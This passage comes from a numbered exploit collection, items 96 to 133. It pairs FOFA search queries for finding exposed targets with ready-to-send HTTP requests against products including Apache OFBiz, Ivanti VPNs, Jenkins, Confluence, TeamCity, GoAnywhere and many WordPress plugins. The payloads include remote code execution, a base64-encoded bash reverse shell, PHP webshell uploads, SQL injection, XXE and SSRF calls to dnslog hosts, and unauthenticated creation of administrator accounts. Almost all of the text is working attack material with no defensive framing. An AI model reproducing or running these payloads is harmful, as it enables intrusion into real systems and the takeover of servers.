POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast Yingkeshi HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML file contents:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart (北京百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement in base64; decoded: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file URL: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5云商城) file.php file upload
